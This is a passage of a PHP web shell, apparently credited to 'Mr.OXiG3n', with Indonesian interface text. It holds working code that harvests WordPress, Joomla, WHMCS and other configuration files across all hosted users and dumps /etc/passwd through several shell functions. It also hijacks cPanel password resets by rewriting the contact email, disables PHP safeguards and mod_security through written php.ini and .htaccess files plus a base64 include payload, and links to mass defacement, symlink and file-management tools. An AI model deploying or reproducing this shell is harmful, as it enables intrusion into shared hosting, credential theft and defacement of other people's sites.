  466. "/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
  467. "/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
  468. "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
  469. "/home/$user_con/public_html/configuration.php" => "Joomla",
  470. "/home/$user_con/public_html/blog/configuration.php" => "Joomla",
  471. "/home/$user_con/public_html/submitticket.php" => "^WHMCS",
  472. "/home/$user_con/public_html/cms/configuration.php" => "Joomla",
  473. "/home/$user_con/public_html/beta/configuration.php" => "Joomla",
  474. "/home/$user_con/public_html/portal/configuration.php" => "Joomla",
  475. "/home/$user_con/public_html/site/configuration.php" => "Joomla",
  476. "/home/$user_con/public_html/main/configuration.php" => "Joomla",
  477. "/home/$user_con/public_html/home/configuration.php" => "Joomla",
  478. "/home/$user_con/public_html/demo/configuration.php" => "Joomla",
  479. "/home/$user_con/public_html/test/configuration.php" => "Joomla",
  480. "/home/$user_con/public_html/v1/configuration.php" => "Joomla",
  481. "/home/$user_con/public_html/v2/configuration.php" => "Joomla",
  482. "/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
  483. "/home/$user_con/public_html/new/configuration.php" => "Joomla",
  484. "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
  485. "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
  486. "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
  487. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  488. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  489. "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
  490. "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
  491. "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
  492. "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
  493. "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
  494. "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
  495. "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
  496. "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
  497. "/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
  498. "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  499. "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
  500. "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
  501. "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
  502. "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
  503. "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
  504. "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
  505. "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
  506. "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
  507. "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
  508. "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
  509. "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
  510. "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
  511. "/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
  512. "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
  513. "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
  514. "/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
  515. "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  516. "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
  517. "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
  518. "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
  519. "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
  520. "/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
  521. "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
  522. "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
  523. "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
  524. "/home/$user_con/public_html/BUY/sumitticket.php" => "WHMCS",
  525. "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
  526. "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
  527. "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
  528. "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
  529. "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
  530. "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  531. "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
  532. "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
  533. "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
  534. "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  535. "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
  536. "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
  537. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  538. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  539. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  540. "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
  541. "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
  542. "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
  543. "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
  544. "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
  545. "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
  546. "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
  547. "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
  548. "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
  549. "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
  550. "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
  551. "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
  552. "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
  553. "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
  554. "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
  555. "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  556. "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
  557. "/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
  558. "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
  559. "/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
  560. "/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
  561. "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
  562. "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
  563. "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
  564. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  565. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  566. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  567. "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
  568. "/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
  569. "/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
  570. "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
  571. "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  572. "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
  573. "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
  574. "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
  575. "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
  576. "/home/$user_con/public_html/bb-config.php" => "BoxBilling",
  577. "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
  578. "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
  579. "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
  580. "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
  581. "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
  582. "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
  583. "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
  584. "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
  585. "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
  586. "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
  587. "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
  588. "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
  589. "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
  590. "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
  591. "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
  592. "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
  593. "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
  594. "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
  595. "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
  596. "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
  597. "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
  598. "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
  599. "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
  600. "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
  601. "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  602. "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
  603. "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
  604. "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
  605. "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
  606. "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
  607. "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
  608. "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
  609. "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
  610. "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
  611. "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
  612. "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
  613. "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
  614. "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
  615. "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
  616. "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
  617. "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
  618. );
  619. foreach($grab_config as $config => $nama_config){
  620. $ambil_config = file_get_contents($config);
  621. if($ambil_config == ''){
  622. }else{
  623. $file_config = fopen("indosec_config/$user_con-$nama_config.txt","w");
  624. fputs($file_config,$ambil_config);
  625. }
  626. }
  627. }
  628. }
  629. echo "<center><p>Success Get Config!!</p>
  630. <a href='?path=$directory/indosec_config' class='btn btn-success btn-block mb-4'>Click Here</a>";
  631. }else{
  632. echo "<form method='post'>
  633. <p class='text-danger'>/etc/passwd error ? <a href='?path=$directory&to=bypassW'>Bypass Here</a></p>
  634. <textarea name='passwd' class='form-control' rows='13'>".file_get_contents('/etc/passwd')."</textarea><br/>
  635. <input type='submit' class='input' value='Get Config!!'>
  636. </form>";
  637. }
  638. } elseif($_GET['to'] == 'bypassW') {
  639. echo '<div claas="container">
  640. <form method="POST">
  641. <p class="text-center">Bypass etc/passwd With :</p>
  642. <div class="d-flex justify-content-center flex-wrap">
  643. <input type="submit" class="fiture btn btn-danger btn-sm" value="System Function" name="syst">
  644. <input type="submit" class="fiture btn btn-danger btn-sm" value="Passthru Function" name="passth">
  645. <input type="submit" class="fiture btn btn-danger btn-sm" value="Exec Function" name="ex">
  646. <input type="submit" class="fiture btn btn-danger btn-sm" value="Shell_exec Function" name="shex">
  647. <input type="submit" class="fiture btn btn-danger btn-sm" value="Posix_getpwuid Function" name="melex">
  648. </div><hr/>
  649. <p class="text-center">Bypass User With :</p>
  650. <div class="d-flex justify-content-center flex-wrap">
  651. <input type="submit" class="fiture btn btn-warning btn-sm" value="Awk Program" name="awkuser">
  652. <input type="submit" class="fiture btn btn-warning btn-sm" value="System Function" name="systuser">
  653. <input type="submit" class="fiture btn btn-warning btn-sm" value="Passthru Function" name="passthuser">
  654. <input type="submit" class="fiture btn btn-warning btn-sm" value="Exec Function" name="exuser">
  655. <input type="submit" class="fiture btn btn-warning btn-sm" value="Shell_exec Function" name="shexuser">
  656. </div>
  657. </form>';
  658. $mail = 'ls /var/mail';
  659. $paswd = '/etc/passwd';
  660. if($_POST['syst']){
  661. echo"<textarea class='form-control' rows='13'>";
  662. echo system("cat $paswd");
  663. echo"</textarea><br/>";
  664. }
  665. if($_POST['passth']){
  666. echo"<textarea class='form-control' rows='13'>";
  667. echo passthru("cat $paswd");
  668. echo"</textarea><br/>";
  669. }
  670. if($_POST['ex']){
  671. echo"<textarea class='form-control' rows='13'>";
  672. echo exec("cat $paswd");
  673. echo"</textarea><br/>";
  674. }
  675. if($_POST['shex']){
  676. echo"<textarea class='form-control' rows='13'>";
  677. echo shell_exec("cat $paswd");
  678. echo"</textarea><br/>";
  679. }
  680. if($_POST['melex']){
  681. echo"<textarea class='form-control' rows='13'>";
  682. for($uid=0;$uid<6000;$uid++){
  683. $ara = posix_getpwuid($uid);
  684. if (!empty($ara)){
  685. while (list ($key, $val) = each($ara)){
  686. print "$val:";
  687. }
  688. print "n";
  689. }
  690. }
  691. echo"</textarea><br/>";
  692. }
  693.  
  694. if ($_POST['awkuser']){
  695. echo"<textarea class='form-control' rows='13'>
  696. ".shell_exec("awk -F: '{ print $1 }' $paswd | sort")."
  697. </textarea><br/>";
  698. }
  699. if ($_POST['systuser']){
  700. echo"<textarea class='form-control' rows='13'>";
  701. echo system("$mail");
  702. echo "</textarea><br>";
  703. }
  704. if ($_POST['passthuser']){
  705. echo"<textarea class='form-control' rows='13'>";
  706. echo passthru("$mail");
  707. echo "</textarea><br>";
  708. }
  709. if ($_POST['exuser']){
  710. echo"<textarea class='form-control' rows='13'>";
  711. echo exec("$mail");
  712. echo "</textarea><br>";
  713. }
  714. if ($_POST['shexuser']){
  715. echo"<textarea class='form-control' rows='13'>";
  716. echo shell_exec("$mail");
  717. echo "</textarea><br>";
  718. }
  719. echo "</div>";
  720. } elseif($_GET['to'] == 'resetcp') {
  721. echo '<h5 class="text-center mb-4"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h5>
  722. <form method="POST">
  723. <div class="form-group input-group">
  724. <div class="input-group-prepend">
  725. <div class="input-group-text"><i class="fa fa-envelope"></i></div>
  726. </div>
  727. <input type="email" name="email" placeholder="Masukan Email..."/>
  728. </div>
  729. <input type="submit" name="submit" class="btn btn-primary btn-block" value="Send"/>
  730. </div>
  731. </form>';
  732. if(isset($_POST['submit'])){
  733. $user = get_current_user();
  734. $site = $_SERVER['HTTP_HOST'];
  735. $ips = getenv('REMOTE_ADDR');
  736. $email = $_POST['email'];
  737. $wr = 'email:'.$email;
  738. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  739. @fwrite($f, $wr);
  740. @fclose($f);
  741. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
  742. @fwrite($f, $wr);
  743. @fclose($f);
  744. $parm = $site.':2082/resetpass?start=1';
  745. echo '<br/>Url: '.$parm.'';
  746. echo '<br/>Username: '.$user.'';
  747. echo '<br/>Success Reset To: '.$email.'<br/><br/>';
  748. }
  749. } elseif($_GET['to'] == 'zipmenu') {
  750. //Compress/Zip
  751. $exzip = basename($directory).'.zip';
  752. function Zip($source, $destination){
  753. if (extension_loaded('zip') === true){
  754. if (file_exists($source) === true){
  755. $zip = new ZipArchive();
  756. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true){
  757. $source = realpath($source);
  758. if (is_dir($source) === true){
  759. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  760. foreach ($files as $file){
  761. $file = realpath($file);
  762. if (is_dir($file) === true){
  763. // $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  764. }elseif(is_file($file) === true){
  765. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  766. }
  767. }
  768. }elseif(is_file($source) === true){
  769. $zip->addFromString(basename($source), file_get_contents($source));
  770. }
  771. }
  772. return @$zip->close();
  773. }
  774. }
  775. return false;
  776. }
  777. //Extract/Unzip
  778. function Zip_Extrack($zip_files, $to_dir){
  779. $zip = new ZipArchive();
  780. $res = $zip->open($zip_files);
  781. if ($res === TRUE){
  782. $name = basename($zip_files, ".zip")."_unzip";
  783. @mkdir($name);
  784. @$zip->extractTo($to_dir."/".$name);
  785. return @$zip->close();
  786. }else{
  787. return false;
  788. }
  789. }
  790. echo '<div class="card card-body text-dark mb-4">
  791. <h4 class="text-center">Zip Menu</h3>
  792. <form enctype="multipart/form-data" method="post">
  793. <div class="form-group">
  794. <label>Zip File:</label>
  795. <div class="custom-file">
  796. <input type="file" name="zip_file" class="btn btn-primary" id="customFile">
  797. </div>
  798. <input type="submit" name="upnun" class="btn btn-danger btn-block mt-3" value="Upload & Unzip"/>
  799. </div>
  800. </form>';
  801. if($_POST["upnun"]){
  802. $filename = $_FILES["zip_file"]["name"];
  803. $tmp = $_FILES["zip_file"]["tmp_name"];
  804. if(move_uploaded_file($tmp, "$directory/$filename")){
  805. echo Zip_Extrack($filename, $directory);
  806. unlink($filename);
  807. $swa = "success";
  808. $text = "Berhasil Mengekstrak Zip";
  809. swall($swa,$text,$directory);
  810. }else{
  811. echo "<b>Gagal!</b>";
  812. }
  813. }
  814. echo "<div class='row'><div class='col-md-6 mb-3'><h5>Zip Backup</h5>
  815. <form method='post'>
  816. <label>Folder</label>
  817. <input type='text' name='folder' class='form-control mb-3' value='$directory'>
  818. <input type='submit' name='backup' class='btn btn-danger btn-block' value='Backup!'>
  819. </form>";
  820. if($_POST['backup']){
  821. $fol = $_POST['folder'];
  822. if(Zip($fol, $_POST["folder"].'/'.$exzip)){
  823. $swa = "success";
  824. $text = "Berhasil Membuat Zip";
  825. swall($swa,$text,$directory);
  826. }else{
  827. echo "<b>Gagal!</b>";
  828. }
  829. }
  830. echo "</div>
  831. <div class='col-md-6'><h5>Unzip Manual</h5>
  832. <form action='' method='post'>
  833. <label>Zip Location:</label>
  834. <input type='text' name='file_zip' class='form-control mb-3' value='$directory/$exzip'>
  835. <input type='submit' name='extrak' class='btn btn-danger btn-block' value='Unzip!'>
  836. </form>";
  837. if($_POST['extrak']){
  838. $zip = $_POST["file_zip"];
  839. if (Zip_Extrack($zip, $directory)){
  840. $swa = "success";
  841. $text = "Berhasil Mengekstrak Zip";
  842. swall($swa,$text,$directory);
  843. }else{
  844. echo "<b>Gagal!</b>";
  845. }
  846. }
  847. echo '</div></div></div>';
  848. } elseif($_GET['to'] == 'disabfunc') {
  849. echo "<div class='card card-body text-center text-dark'>
  850. <h4 class='text-center mt-2 mb-3'>Bypass Disable Functions</h2>
  851. <form method='POST'>
  852. <input type='submit' class='btn btn-danger' name='ini' value='php.ini'/>
  853. <input type='submit' class='btn btn-danger' name='htce' value='.htaccess'/>
  854. <input type='submit' class='btn btn-danger' name='litini' value='Litespeed'/>
  855. </form>";
  856. if(isset($_POST['ini'])){
  857. $file = fopen("php.ini","w");
  858. echo fwrite($file,"safe_mode = OFF\ndisable_functions = NONE");
  859. fclose($file);
  860. echo "<a href='php.ini' class='btn btn-success btn-block' target='_blank'>Klik Coeg!</a>";
  861. }elseif(isset($_POST['htce'])){
  862. $file = fopen(".htaccess","w");
  863. echo fwrite($file,"<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
  864. fclose($file);
  865. echo "<p>.htaccess successfully created!</p>";
  866. }elseif(isset($_POST['litini'])){
  867. $iniph = "PD8gZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbImZpbGUiXSk7DQplY2hvIGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbInNzIl07DQo/Pg==";
  868. $byph = "safe_mode = OFF\ndisable_functions = NONE";
  869. $comp = "<Files *.php>\nForceType application/x-httpd-php4\n</Files>";
  870. file_put_contents("php.ini",$byph);
  871. file_put_contents("ini.php",$iniph);
  872. file_put_contents(".htaccess",$comp);
  873. $swa = "success";
  874. $text = "Disable Functions in Litespeed Created";
  875. swall($swa,$text,$directory);
  876. }
  877. echo "</div>";
  878. } elseif(isset($_GET['about'])) {
  879. echo "Ip Server : <font size=2 color=aqua>".$ip_web."</font><br>";
  880. echo "PHP Version : <font size=2 color=aqua>".$ver."</font><br>";
  881. echo "Domain : <font size=2 color=aqua>".$dom."</font><br>";
  882. }
  883. $file = $_FILES['files']['name'];
  884. if(isset($_FILES['file'])){
  885. if(copy($_FILES['file']['tmp_name'],$directory.'/'.$_FILES['file']['name'])){
  886. echo '<font color="green">Berhasil Upload</a></font><br />';
  887. }else{
  888. echo '<font color="red">Gagal Upload,Cek Permission</font><br/>';
  889. }
  890. }
  891. echo '<form enctype="multipart/form-data" method="POST">
  892. <span class="btn btn-primary">Upload File :</span><input class="btn btn-primary" type="file" name="file" />
  893. <button type="submit" class="btn btn-primary btn-block">Upload</button>
  894. </form>
  895. </td></tr>';
  896. echo "<center>";
  897. echo "<hr>";
  898. echo "[ <a href='?'>Home</a> ]";
  899. echo "[ <a href='?path=$directory&to=mass'>Mass Deface</a> ]";
  900. echo "[ <a href='?path=$directory&to=zoneh'>Zone-h</a> ]";
  901. echo "[ <a href='?path=$directory&to=sym'>Symlink</a> ]";
  902. echo "[ <a href='?path=$directory&to=jumping'>Jumping</a> ]";
  903. echo "[ <a href='?path=$directory&to=config'>Grab Config</a> ]";
  904. echo "[ <a href='?path=$directory&to=adm'>Spawn Adminer</a> ]";
  905. echo "[ <a href='?path=$directory&to=resetcp'>Crack Cpanel</a> ]";
  906. echo "[ <a href='?path=$directory&to=zipmenu'>Zip Menu</a> ]";
  907. echo "[ <a href='?about'>About Domain</a> ]";
  908. echo "<hr>";
  909. if(isset($_GET['filesrc'])){
  910. echo "<tr><td>Current File : ";
  911. echo $_GET['filesrc'];
  912. echo '</tr></td></table><br />';
  913. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  914. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  915. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  916. if($_POST['opt'] == 'chmod'){
  917. if(isset($_POST['perm'])){
  918. if(chmod($_POST['path'],$_POST['perm'])){
  919. echo '<font color="lime">Change Permission Berhasil</font><br/>';
  920. }else{
  921. echo '<font color="pink">Change Permission Gagal</font><br />';
  922. }
  923. }
  924. echo '<form method="POST">
  925. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  926. <input type="hidden" name="path" value="'.$_POST['path'].'">
  927. <input type="hidden" name="opt" value="chmod">
  928. <input type="submit" value="Go" />
  929. </form>';
  930. }elseif($_POST['opt'] == 'rename'){
  931. if(isset($_POST['newname'])){
  932. if(rename($_POST['path'],$directory.'/'.$_POST['newname'])){
  933. echo '<font color="lime">Ganti Nama Berhasil</font><br/>';
  934. }else{
  935. echo '<font color="pink">Ganti Nama Gagal</font><br />';
  936. }
  937. $_POST['name'] = $_POST['newname'];
  938. }
  939. echo '<form method="POST">
  940. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  941. <input type="hidden" name="path" value="'.$_POST['path'].'">
  942. <input type="hidden" name="opt" value="rename">
  943. <input type="submit" value="Go" />
  944. </form>';
  945. } elseif($_POST['opt'] == 'edit'){
  946. if(isset($_POST['src'])){
  947. $fp = fopen($_POST['path'],'w');
  948. if(fwrite($fp,$_POST['src'])){
  949. echo '<font color="lime">Berhasil Edit File, gud anjg</font><br/>';
  950. }else{
  951. echo '<font color="pink">Gagal Edit File , Cek Permission Dir :D</font><br/>';
  952. }
  953. fclose($fp);
  954. }
  955. echo '<form method="POST">
  956. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  957. <input type="hidden" name="path" value="'.$_POST['path'].'">
  958. <input type="hidden" name="opt" value="edit">
  959. <input type="submit" value="Save" />
  960. </form>';
  961. }
  962. echo '</center>';
  963. }else{
  964. echo '</table><br/><center>';
  965. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  966. if($_POST['type'] == 'dir'){
  967. if(rmdir($_POST['path'])){
  968. echo '<font color="lime">Directory Terhapus</font><br/>';
  969. }else{
  970. echo '<font color="pink">Directory Gagal Terhapus </font><br/>';
  971. }
  972. }elseif($_POST['type'] == 'file'){
  973. if(unlink($_POST['path'])){
  974. echo '<font color="lime">File Terhapus</font><br/>';
  975. }else{
  976. echo '<font color="pink">File Gagal Dihapus</font><br/>';
  977. }
  978. }
  979. }
  980. echo '</center>';
  981. $scandir = scandir($directory);
  982. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  983. <tr>
  984. <td class="td_home"><center>Name</peller></center></td>
  985. <td class="td_home"><center>Size</peller></center></td>
  986. <td class="td_home"><center>Permission</peller></center></td>
  987. <td class="td_home"><center>Action</peller></center></td>
  988. </tr>';
  989.  
  990. foreach($scandir as $dir){
  991. if(!is_dir($directory.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  992. echo '<tr>
  993. <td class="td_home"><a href="?path='.$directory.'/'.$dir.'">'.$dir.'</a></td>
  994. <td class="td_home"><center>--</center></td>
  995. <td class="td_home"><center>';
  996. if(is_writable($directory.'/'.$dir)) echo '<font color="lime">';
  997. elseif(!is_readable($directory.'/'.$dir)) echo '<font color="pink">';
  998. echo perms($directory.'/'.$dir);
  999. if(is_writable($directory.'/'.$dir) || !is_readable($directory.'/'.$dir)) echo '</font>';
  1000.  
  1001. echo '</center></td>
  1002. <td class="td_home"><center><form method="POST" action="?option&path='.$directory.'">
  1003. <select name="opt">
  1004. <option value="">Select</option>
  1005. <option value="delete">Delete</option>
  1006. <option value="chmod">Chmod</option>
  1007. <option value="rename">Rename</option>
  1008. </select>
  1009. <input type="hidden" name="type" value="dir">
  1010. <input type="hidden" name="name" value="'.$dir.'">
  1011. <input type="hidden" name="path" value="'.$directory.'/'.$dir.'">
  1012. <input type="submit" value=">">
  1013. </form></center></td>
  1014. </tr>';
  1015. }
  1016. echo '<tr><td></td><td></td><td></td><td></td></tr>';
  1017. foreach($scandir as $file){
  1018. if(!is_file($directory.'/'.$file)) continue;
  1019. $size = filesize($directory.'/'.$file)/1024;
  1020. $size = round($size,3);
  1021. if($size >= 1024){
  1022. $size = round($size/1024,2).' MB';
  1023. }else{
  1024. $size = $size.' KB';
  1025. }
  1026.  
  1027. echo '<tr>
  1028. <td class="td_home"><a href="?filesrc='.$directory.'/'.$file.'&path='.$directory.'">'.$file.'</a></td>
  1029. <td class="td_home"><center>'.$size.'</center></td>
  1030. <td class="td_home"><center>';
  1031. if(is_writable($directory.'/'.$file)) echo '<font color="lime">';
  1032. elseif(!is_readable($directory.'/'.$file)) echo '<font color="pink">';
  1033. echo perms($directory.'/'.$file);
  1034. if(is_writable($directory.'/'.$file) || !is_readable($directory.'/'.$file)) echo '</font>';
  1035. echo '</center></td>
  1036. <td class="td_home"><center><form method="POST" action="?option&path='.$directory.'">
  1037. <select name="opt">
  1038. <option value="">Select</option>
  1039. <option value="delete">Delete</option>
  1040. <option value="chmod">Chmod</option>
  1041. <option value="rename">Rename</option>
  1042. <option value="edit">Edit</option>
  1043. </select>
  1044. <input type="hidden" name="type" value="file">
  1045. <input type="hidden" name="name" value="'.$file.'">
  1046. <input type="hidden" name="path" value="'.$directory.'/'.$file.'">
  1047. <input type="submit" value=">">
  1048. </form></center></td>
  1049. </tr>';
  1050. }
  1051. echo '</table>
  1052. </div>';
  1053. }
  1054. echo '</body>
  1055. </html>';
  1056. echo '<center><br/><font><a href="https://www.aditinfo.eu.org">Mr.OXiG3n</a></font><br><br>[ <a href="?keluar">Keluar</a> ]</center>
  1057. </body>
  1058. </html>';
  1059. function perms($file){
  1060. $perms = fileperms($file);
  1061.  
  1062. if (($perms & 0xC000) == 0xC000) {
  1063. // Socket
  1064. $info = 's';
  1065. } elseif (($perms & 0xA000) == 0xA000) {
  1066. // Symbolic Link
  1067. $info = 'l';
  1068. } elseif (($perms & 0x8000) == 0x8000) {
  1069. // Regular
  1070. $info = '-';
  1071. } elseif (($perms & 0x6000) == 0x6000) {
  1072. // Block special
  1073. $info = 'b';
  1074. } elseif (($perms & 0x4000) == 0x4000) {
  1075. // Directory
  1076. $info = 'd';
  1077. } elseif (($perms & 0x2000) == 0x2000) {
  1078. // Character special
  1079. $info = 'c';
  1080. } elseif (($perms & 0x1000) == 0x1000) {
  1081. // FIFO pipe
  1082. $info = 'p';
  1083. } else {
  1084. // Unknown
  1085. $info = 'u';
  1086. }
  1087.  
